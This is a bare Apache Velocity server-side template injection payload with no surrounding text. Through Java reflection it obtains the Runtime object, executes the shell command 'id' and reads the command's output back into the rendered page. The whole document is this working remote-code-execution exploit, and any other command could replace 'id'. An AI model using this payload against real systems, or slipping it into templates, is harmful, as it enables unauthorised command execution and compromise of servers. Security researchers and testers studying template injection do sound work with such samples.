#set($ex=$i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('id'))
$ex.waitFor()
#set($out=$ex.getInputStream())
#foreach($i in [1..$out.available()])
    #set($tmp=$str.valueOf($chr.toChars($out.read())))
    #set($result=$result$tmp)
$result
#end
